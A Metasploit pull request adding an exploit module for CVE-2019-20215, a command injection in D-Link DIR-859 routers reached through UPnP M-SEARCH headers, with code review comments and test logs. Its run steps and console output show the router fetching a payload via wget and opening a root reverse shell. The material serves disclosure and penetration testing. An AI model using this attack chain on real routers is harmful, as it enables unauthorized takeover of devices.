Cve 2019 20215
rapid7/metasploit-framework pull request #12887
Opened 2020-01-28 19:26 UTC by s1kr10s

## Introduction

This module exploits CVE-2019–20215, an unauthenticated remote injection of operating system commands. The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID or URN headers of a M-SEARCH UPnP request.

## Vulnerable Application

Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147)), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.

## Verification Steps

1. Set up router/emulated device
2. Start `msfconsole`
3. Do: `use exploit/linux/http/dlink_dir859_exec_ssdpcgi`
4. Do: `set RHOSTS <router_ip>`
5. Do: `set LHOST <local_ip>`
6. Do: `set TARGET <URN/UUID>`
7. Do: `run`
8. You should get a session as `root`.

## Scenarios

### D-link DIR-859 Firmware 1.05
```
msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run 
[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://0.0.0.0:8080/38YWEX2
[*] Local IP: http://192.168.70.28:8080/38YWEX2
[*] Target Payload URN
[*] Client 192.168.0.1 (Wget) requested /38YWEX2
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
[*] Server stopped.
meterpreter > 
```

(Was PR #12769 @space-r7 @bcoles )

2020-01-30 14:58 UTC, smcintyre-r7 requested changes

2020-01-30 14:58 UTC, smcintyre-r7 commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +      Opt::RHOST(),
This shouldn't be necessary, it'll automatically be added by including the `include Msf::Exploit::Remote::Udp`.

2020-01-30 14:58 UTC, smcintyre-r7 commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +  include Msf::Exploit::Remote::HttpClient
The HTTP methods that you're including here don't look like they're being used anywhere.

2020-01-30 14:58 UTC, smcintyre-r7 commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +      'Targets'        =>
So since your different target definitions don't have any impact on the selected payload, I think this option should be exposed as an `OptEnum`. That would allow you to specify that either `urn` or `uuid` is a valid option. The only catch here is that you shouldn't name the option `TARGET` because that has a generally accepted meaning throughout the framework. Maybe calling it `VECTOR` would be better?

Example:
```Msf::OptEnum.new('name',[true, 'A Boolean Value', 'Foo', ['Foo', 'Bar', 'Baz']])```
That would go in the `register_options` section.

2020-01-30 14:58 UTC, smcintyre-r7 commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +    header =
Usually in Ruby we try to concatenate strings using the `<<` operator. This has performance benefits that, at the scale of the Metasploit Framework are important.

That would make this:
```ruby
header = "M-SEARCH * HTTP/1.1\r\n"
header << "Host:239.255.255.250:1900\r\n"
# etc.
```

2020-01-30 15:14 UTC, acammack-r7 commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +        },
I don't think these are needed for this exploit and architecture.

2020-01-30 17:26 UTC, sempervictus commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +      "Host:239.255.255.250:1900\r\n" +
If you _are_ leaving in the RPORT option, probably makes sense to interpolate the value here instead of hard-coding the port.

2020-01-30 17:46 UTC, acammack-r7 commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +    header =
Both this comment and the approach in the module are wrong for string literals. [Here is our style guide on the subject](https://github.com/rubocop-hq/ruby-style-guide#long-strings).

2020-01-30 17:52 UTC, sempervictus commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +    header =
Dont know if this is still true in modern Ruby, but at least back in the day, `+=` copied the original value and added the new value before assigning back to the variable, resulting in added memory/GC pressure, while `<<` expanded the current string length by the number of bytes in the added value and wrote it in there directly (this being a good example of why there's a GIL). For small strings like this, it comes down to more of a syntax and consistency issue, but if you were doing this with giant buffers of metasm or JS or something like that, it made a noticeable difference.

2020-01-30 18:10 UTC, acammack-r7 commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +    header =
Yep, the `+` copies are quite bad. The hidden cost of using `<<` for concatenation of literals is that you still have all the extra string objects being created and then abandoned to the garbage collector.

2020-02-05 14:03 UTC, space-r7 commented on modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
> +      Msf::OptEnum.new('VECTOR',[true, 'Header thrugh which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
```suggestion
      Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
```

2020-02-05 18:13 UTC, space-r7 commented
Tested on emulated `v1.05` firmware:

```
msf5 > use exploit/linux/upnp/dlink_dir859_exec_ssdpcgi 
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > set rhosts 192.168.0.1
rhosts => 192.168.0.1
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > options

Module options (exploit/linux/upnp/dlink_dir859_exec_ssdpcgi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.0.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    1900             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VECTOR   URN              yes       Header through which to exploit the vulnerability (Accepted: URN, UUID)


Payload options (linux/mipsbe/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > run

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://0.0.0.0:8080/wP1bgrL7
[*] Local IP: http://127.0.0.1:8080/wP1bgrL7
[*] Target Payload URN
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Client 192.168.0.1 (Wget) requested /wP1bgrL7
[*] Sending payload to 192.168.0.1 (Wget)
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:46802) at 2020-02-05 09:58:21 -0800
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.1
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > 

```

2020-02-05 19:20 UTC, merged

2020-02-05 19:23 UTC, space-r7 commented
## Release Notes

This exploits an unauthenticated command injection vulnerability for a subset of D'link routers. Passing commands through either the `uuid` header or the `urn` header in an M-SEARCH request gets passed unsanitized to `system()`, allowing for code execution on the target.